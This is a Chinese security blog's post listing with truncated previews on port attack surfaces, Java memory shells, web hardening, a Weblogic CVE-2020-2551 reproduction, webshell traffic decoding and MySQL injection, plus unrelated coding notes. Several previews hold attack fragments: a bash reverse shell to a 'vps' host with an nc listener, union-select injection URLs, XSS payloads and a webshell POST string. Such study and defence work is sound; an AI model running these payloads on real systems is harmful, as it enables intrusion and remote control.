- 博客(15)
- 收藏
- 关注
![](https://csdnimg.cn/release/blogv2/dist/pc/img/listFixedTop.png)
原创 常见端口&漏洞
远程连接端口端口号端口说明使用说明22SSH远程连接爆破、SSH隧道及内网代理转发、文件传输23Telnet远程连接爆破、嗅探、弱口令3389RDP远程桌面连接爆破、远程命令执行5900VNC弱口令爆破5632PcAnywhere服务抓取密码、代码执行访问资源端口端口号端口说明使用说明21、20、69FTP/TFTP文件传输协议允许匿名的上传、下载、爆破和嗅探操作2049NFS服务配置不当4
2020-06-15 10:36:02
900
原创 获取指定目录下所有php文件所在路径
获取指定目录下所有php文件所在路径0x01 前言今天看渗透贴提到的,感觉有点用,python手有点生,就当练习了。0x02 代码#!/usr/bin/python# -*- coding: UTF-8 -*-import osimport reimport argparsedef print_all_phpfile_path(init_file_path, ext): for dirpath, dirs, files in os.walk(init_file_path):
2021-11-11 12:11:51
706
原创 Java MemShell
0x00 目录0x01 内存马的类型0x02 植入内存马的各种工具1.Tomcat 无文件内存马(Java Instrumentation类Agent型)2.Godzilla 2.9 (Servlet-api类 servlet型)3.Servlet-api类Filter型4.Servlet-api类 Listener型5.Spring类 Controller型6.Spring类 Interceptor类0x03 开源工具流量特征0x04 检测工具1.c0ny1开发的内存马检测工具2.VisualVM0x05
2021-01-27 17:58:09
1780
1
原创 常见web攻击的加固方法
0x01 XSS1.过滤特殊字符(XSS Filter)过滤恶意标签+属性(1)href伪协议<a href=javascript:('/a/')>test</a>(2)HTML新增标签<math><maction xlink:href=>、<embed src=>(3)利用DataUrl协议<a href="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTs8L3NjcmlwdD4
2020-07-07 22:16:22
1335
原创 python写个简单的poc
import requestsimport argparseRequest头:header={ 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36', 'Content-Type':'text/xml' }请求体内容:三个单引号后不要换行,会报错。data='''<?xml versi
2020-05-25 21:28:30
931
原创 Weblogic RMI-IIOP(cve-2020-2551)复现
0x01 复现RMI方式:1.vps 生成exp.class(示例为windows弹计算器,如果想反弹linux shell 把命令改成bash -i >& /dev/tcp/vps/4444 0>&1,然后vps用nc -lvvp 4444 监听本地端口即可,用java1.6版本编译成功率高)javac -source 1.6 -target 1.6 exp...
2020-04-29 19:19:31
1446
2
原创 去除/添加服务器响应头的信息
0x01 去掉响应头的信息针对通过响应头判断服务器版本和语言版本的信息泄露漏洞,如何去防护1.1 php 隐藏 X-Power-ByPHP 设置php.iniexpose_php = Off1.2 隐藏server信息1.2.1 apache在apache/conf/httpd.conf 添加以下代码(我试了试在最后一行添加没有问题)ServerSignature Off Se...
2020-03-16 18:09:49
2406
原创 冰蝎PHP码流量还原
0x01前言之前打3ctf的时候看见了一道冰蝎流量还原的misc,之后觉得还挺有意思的,毕竟之前网站被种过马 ,弄出来之后搞个工具结合全流量设备或者wireshark的包来还原攻击者到底做了哪些动作,故有了此文。0x02环境准备phpstudy(注意在php环境中要开一下php_openssl,默认好像是没开的)冰蝎v2.00x03过程首先贴一下一般用的冰蝎的PHP码:<?ph...
2019-12-03 16:56:28
1325
2
原创 PHP
0x01 标记风格1.脚本风格:2.简短风格:<? echo '这是简短风格的标记'; ?>3.ASP风格:<% echo ‘这是ASP风格的标记’; %>简短风格和ASP风格需要在php.ini中配置。将short_open_tag和asp_tags都设置为ON,重启Apache服务器。0x02 注释1.//2./…/3.#0x03 数据类型1...
2019-07-24 16:46:55
126
原创 针对MySQL的sql注入
//判断order by后面的个数http://xxx.com/index.php?id=1 order by 3//判断哪一个可回显http://xxx.com/index.php?id=-1 union sel<>ect 1,2,3//注入数据库名http://xxx.com/index.php?id=-1 union sel<>ect 1,databas...
2019-03-13 15:09:46
680
原创 python——pandas
一些很杂的笔记和实现的功能#_*_ coding:utf-8 _*_import numpy as npimport pandas as pd'''#Note#获取en.csv中的信息df = pd.DataFrame(pd.read_csv('en.csv',header=0))#获取name.xlsx中的信息df = pd.DataFrame(pd.read_excel(...
2019-02-14 19:40:32
217
1
原创 工具使用——Burp与FoxyProxy Standard配置
配置过程中曾经遇到过的问题,记录一下。配置完成后即可一键切换,不用再进入浏览器的设置中再调①打开FoxyProxy Standard,新建代理服务器②将主机或IP地址填写为burp代理中的地址即可。PS:1.可能会遇到已安装java环境,但Burp有个动画显示打开,但是半天没反应。解决方法:可以尝试使用cmd命令行打开&gt;java -jar burp.jar //输入bu...
2018-10-23 21:59:54
8915
原创 常用编码
I.ASCII编码 示例: (hex转ascii) 28 62 61 73 65 36 34 5f 64 65 63 6f 64 65 28 24 5f 50 4f 53 54 5b 7a 30 5d 29 29 3b 26 7a 30 3d 51 47 6c 75 61 56 39 7a 5a (base64_decode($_POST[z0]));&amp;amp;amp;z0=QGluaV...
2018-09-12 23:35:08
2485
原创 java EE开发:基础的HTML语言(常用标签+属性)
一、标签通用属性 size 大小(1,2, …) color 颜色 width=x% 长度(10,20,30 …) align 行对齐方式(left,right,middle) valign 上下对齐方式(top,bo
2017-12-26 21:15:32
466
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人